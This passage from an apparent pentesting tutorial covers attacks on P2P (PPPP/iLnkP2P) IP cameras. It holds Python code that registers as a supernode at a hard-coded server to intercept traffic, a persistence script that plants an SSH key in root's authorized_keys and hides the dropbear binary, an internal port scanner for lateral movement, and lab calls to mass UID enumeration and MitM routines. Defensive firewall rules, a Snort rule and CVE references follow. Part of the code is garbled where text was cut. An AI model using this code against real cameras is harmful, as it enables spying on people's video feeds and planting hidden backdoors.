strangers' video **Exploitation**: ```python def register_as_supernode(server='121.42.208.86', port=32100): """ Register as a supernode to intercept traffic """ sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # Build supernode registration message = bytearray() message.extend(b'\xF1\x00\x30\x00') message.extend(struct.pack('> /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys # Start dropbear SSH dropbear -p 22 -r /etc/dropbear/dropbear_rsa_host_key # Add to startup echo "/usr/sbin/dropbear -p 22" >> /etc/init.d/rcS # Hide process mv /usr/sbin/dropbear /lib/.system ln -s /lib/.system /usr/sbin/dropbear ``` #### 2. Lateral Movement ```python # Scan internal network from compromised camera def scan_internal_network(): """ Use camera to scan internal network """ import socket # Get camera's network my_ip = socket.gethostbyname(socket.gethostname()) network = '.'.join(my_ip.split('.')[0:3]) # Scan for other devices for i in range(1, 255): target = f"{network}.{i}" # Check common ports for port in [22, 23, 80, 554, 8000]: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(0.5) if sock.connect_ex((target, port)) == 0: print(f"[+] {target}:{port} - OPEN") sock.close() scan_internal_network() ``` *** ## Defense & Mitigation #### 1. Immediate Actions **For Users:** ```bash # Block outbound UDP 32100 sudo iptables -A OUTPUT -p udp --dport 32100 -j DROP # Block known P2P servers sudo iptables -A OUTPUT -d 121.42.208.86 -j DROP sudo iptables -A OUTPUT -d 54.221.213.97 -j DROP sudo iptables -A OUTPUT -d 120.24.37.48 -j DROP ``` **For Network Administrators:** ``` # Cisco ACL to block P2P traffic access-list 100 deny udp any any eq 32100 access-list 100 deny udp any any eq 32108 access-list 100 permit ip any any # Apply to outbound interface interface GigabitEthernet0/1 ip access-group 100 out ``` #### 2. Long-Term Solutions 1. **Replace Vulnerable Cameras** * Avoid any P2P-enabled devices * Use cameras with local-only access * Prefer enterprise brands with security track records 2. **Network Segmentation** * Isolate IoT devices on separate VLAN * No Internet access for cameras * VPN for remote access 3. **Monitoring & Detection** ```python # IDS rule for Suricata/Snort alert udp any any -> any 32100 (msg:"PPPP P2P Traffic Detected"; \ content:"|F1 00|"; offset:0; depth:2; \ sid:1000001; rev:1;) ``` *** ## Practical Lab Scenarios #### Lab 1: Setting Up Vulnerable Environment ```bash # Deploy vulnerable P2P camera in Docker git clone https://github.com/vulnerables/p2p-camera-sim cd p2p-camera-sim docker-compose up -d # Vulnerable camera now running on: # HTTP: http://localhost:8080 # PPPP: udp://localhost:32100 # RTSP: rtsp://localhost:554/stream1 ``` #### Lab 2: Traffic Analysis Exercise ```bash # Capture P2P traffic sudo tcpdump -i eth0 -w lab_capture.pcap 'udp port 32100' # Analyze with Wireshark + PPPP dissector wireshark lab_capture.pcap ``` #### Lab 3: Exploitation Practice ```python # Practice UID enumeration target_prefix = "LAB" found = mass_enumerate_iLnkP2P(target_prefix, 0, 1000) # Practice credential interception mitm_iLnkP2P_session() ``` *** ### Conclusion P2P cameras represent a critical security failure in the IoT ecosystem. With over 50 million vulnerable devices and no patches from many vendors, these cameras will remain exploitable for years to come. **Key Takeaways:** 1. **Never use P2P-enabled cameras** for security-sensitive applications 2. **Block UDP port 32100** at firewall to disable P2P 3. **Replace vulnerable cameras** - patching is often impossible 4. **Implement defense in depth** - VLANs, VPNs, monitoring 5. **Stay informed** - new vulnerabilities discovered regularly **For Pentesters:** * P2P cameras are low-hanging fruit in most environments * Tools and exploits widely available * Mass exploitation possible via UID enumeration * Always obtain proper authorization before testing *** ### Additional Resources #### Tools & Scripts * [Paul Marrapese's IoT Research](https://github.com/pmarrapese/iot) - UID enumeration, protocol analysis * [PPPP Wireshark Dissector](https://github.com/magicus/pppp-dissector) - Traffic analysis * [lib32100](https://github.com/fbertone/lib32100) - PPPP protocol library * [Shodan](https://www.shodan.io/) - Internet-wide P2P camera discovery #### Vulnerability Databases * CVE-2019-11219 (iLnkP2P UID Enumeration) * CVE-2019-11220 (iLnkP2P MitM) * CVE-2020-9525 (CS2 Network MitM) * CVE-2020-9526 (CS2 Network MitM) * CVE-2020-9529 (Hichip Pre-Auth RCE) {% hint style="success" %} Learn & practice [**For the Bug Bounty**](https://shop.verylazytech.com/)

Support VeryLazyTech 🎉

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/)**! 🎁** * **Follow** us on: * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚

{% endhint %}